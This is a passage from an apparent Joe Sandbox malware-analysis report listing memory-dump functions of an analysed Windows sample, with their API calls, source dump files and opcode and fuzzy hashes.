                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                            • Opcode ID: d7ef92f44fff1e3159db7ff72dc88b72e26a82aeecce791fa7d4f6ef2c8c7bc3
                                                                                                                                                                                                                                                                            • Instruction ID: 7b8f2c2d7c7577b311ae581f1ceccb67f7880e24385ae5d9a4fcaa6ecd4bfe17
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7ef92f44fff1e3159db7ff72dc88b72e26a82aeecce791fa7d4f6ef2c8c7bc3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A31118B690410AAFCB05DF58E945A9E7BF4EF48310F154069F809AB311DA31EA258BA5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C24FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00C2319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00C25031
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C253DF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                            • Instruction ID: d927f214e0cddcd200a6b561af89080bcc155b603cbbfd1b5c48b3e4b01dd339
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F00149B62003546BE331CF69E88195AFBEDEB85370F65051DE594836C0EB70A905C774
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                            • Instruction ID: 98182e3be001c44348086327ebcc6c7237e540bfaad2d0904d3a4595b74fbe0d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90F0283250163057D6313A6BAC05BDA33989F43331F100B26FD22D75D1EB74E982B6D2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                                                                                                                                            • Opcode ID: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                            • Instruction ID: 381c7b0ca9a7e157a9b223a69f98e279c9b8dbea1627a945b1d779ae5723dbff
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09F028B36017047EC7149F28C806FAABB98EB44360F20812AFB19CB1D0DB71E450ABE4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00C6F987
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1777cf34032312dc5a679d6161ad8c9271097075c72e506808b89f8a4930ce94
                                                                                                                                                                                                                                                                            • Instruction ID: 4d1c3d33c73176eb0abcfabceb9379ed13393c223ac3c351aea6882d2ddcbcba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1777cf34032312dc5a679d6161ad8c9271097075c72e506808b89f8a4930ce94
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06F08C72600208BFCB10EBA5DC46EAFB7B8EF4A720F104059F6059B260DA74EE81D760
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00C2319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00C25031
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: cd630fed2f79b75ac29b4fbeca7c9637916a035ca4a155099ca521a4a07614e9
                                                                                                                                                                                                                                                                            • Instruction ID: 1b0d163f56ea7d33b77a5d803320b07706de49a9284bca7e2abb691e54e6b19e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd630fed2f79b75ac29b4fbeca7c9637916a035ca4a155099ca521a4a07614e9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4F0E932510E30A7DB312A27FC45F5B3748AF827F0F148011F825D74A0DA70D90166E0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C16A79,?,0000015D,?,?,?,?,00C185B0,000000FF,00000000,?,?), ref: 00C23BC5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8f06d304d59f728a90f3c471137fc4911d4f03c08993b0fdfda968d626b55d42
                                                                                                                                                                                                                                                                            • Instruction ID: 38776b0060dfac8042f62b2d2156a67b447e0f43e8b6fbd8cb674a7c3465b973
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f06d304d59f728a90f3c471137fc4911d4f03c08993b0fdfda968d626b55d42
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5E0E5352006B4A7DA223E72BC01F9A364C9F427A0F1401A0FC25968A0CF38CF42A2E0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d0c66d8321e2064d7421193ee2b7afd90abb45521cfd9cf491413e35b6499c38
                                                                                                                                                                                                                                                                            • Instruction ID: 70922c8c7c6ae3bcba47d6bee26bc1075961afb405d9e52665c39ae7e241d205
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0c66d8321e2064d7421193ee2b7afd90abb45521cfd9cf491413e35b6499c38
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F015B1505702DFCB349F64D8A4866BBF4AF14329324897EEAD687610C731A884EF50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                            • Opcode ID: d10173828fd02b29f6defb8dd0af3251c9209583f72f5c39dd9276436fc02484
                                                                                                                                                                                                                                                                            • Instruction ID: 7b0fe7f3fae8a590ba8146a665a33c825ec119244d288e6aad03994b4bbaad9c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d10173828fd02b29f6defb8dd0af3251c9209583f72f5c39dd9276436fc02484
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF0E5B1B04204AAD7209B6598057AAF7E8BB02314F14851ED8E5821C1C7B644D4E762
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                            • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                            • Instruction ID: d3cb4e7d4671a11455880088eeaefa79206c1383e96bae2abe1b6d993f02e5ab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23F0F87551020DFFDF05DF90C941EAEBBB9FB05318F208489F9159A151C336EA61ABA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BF3963
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3573498d7ee526a8ec80c58a9e8c7b4a3d7c353c4c23cd806dc950d352cbf37f
                                                                                                                                                                                                                                                                            • Instruction ID: cd8d94a645f3d5f81beca4b506be30226ccc4033c679ac80189c605f6a735991
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3573498d7ee526a8ec80c58a9e8c7b4a3d7c353c4c23cd806dc950d352cbf37f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF012709143589FE7529F24DC45B997BFCA701708F0400A5A64596192D7749788CB51
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00BF3A76
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                                                                                                                                                            • Opcode ID: 847783604c2108ad50c8a6e8d4b946fcfd2612a1c29d9fbdc33835d41e4799ad
                                                                                                                                                                                                                                                                            • Instruction ID: 9eff55d9846de33196d131e92ea90e81bc170d7c2476d21fae8bdd9b5399a2d1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 847783604c2108ad50c8a6e8d4b946fcfd2612a1c29d9fbdc33835d41e4799ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADE0C272A002285BCB20A2589C06FEE77EDDFC87A0F0440B1FD09D7258D960ED809690
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00C30A84,?,?,00000000,?,00C30A84,00000000,0000000C), ref: 00C30737
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                            • Opcode ID: 725a774dad7b5aa740b441e6fa8f99e5310bbc3ae427ace371a55059675bc192
                                                                                                                                                                                                                                                                            • Instruction ID: b152387734b6c1c90aa432763186ad66886709c61145b240abd0f07124b83a19
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 725a774dad7b5aa740b441e6fa8f99e5310bbc3ae427ace371a55059675bc192
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4D06C3200010DBBDF028F84DD46EDE3BAAFB48714F014000BE1896060C732E821AB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00C5D840), ref: 00C5EAB1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                            • Opcode ID: 34bd41c76336ce4b4b28d3a0950b1431652386261ec07bfa11c3cf55452cb9f0
                                                                                                                                                                                                                                                                            • Instruction ID: 621ccd17747dec7537dce55b50cbcc9fcaa6e00bbdd16c37696cd1e2a250d147
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34bd41c76336ce4b4b28d3a0950b1431652386261ec07bfa11c3cf55452cb9f0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DB0923800060005AD2C0A385A09A993B007862BB67DC1BC0F87E850E1C3398E8FBA58
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DC54: FindFirstFileW.KERNEL32(?,?), ref: 00C5DCCB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5DD1B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C5DD2C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DC54: FindClose.KERNEL32(00000000), ref: 00C5DD43
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C6666E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                            • Opcode ID: ff6a894a217dcefee864b4da87f8fcbc26edec814bfd31f5e94438a8124b6344
                                                                                                                                                                                                                                                                            • Instruction ID: e97e709767bb3ed46876e5c07aeba5fc9ade6286dfbe34c4815c1893ebc76780
